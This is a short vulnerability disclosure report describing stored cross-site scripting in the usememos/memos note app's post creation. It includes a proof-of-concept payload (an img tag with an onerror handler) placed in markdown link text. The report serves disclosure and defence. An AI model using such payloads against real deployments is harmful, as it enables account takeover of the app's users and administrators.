Stored XSS while creating a new post in usememos/memos
Reported on
Dec 19th 2022
Description
After login create a new post and type the following text with XSS payload
XSS in create post [<img src=x onerror=alert(1)>](http://test.cc)
then click post that will be executed.
Proof of Concept
XSS in create post [te<img src=x onerror=alert(1)>te](http://google.com)
Impact
Users account takeover + admin
SECURITY.md
exists
a year ago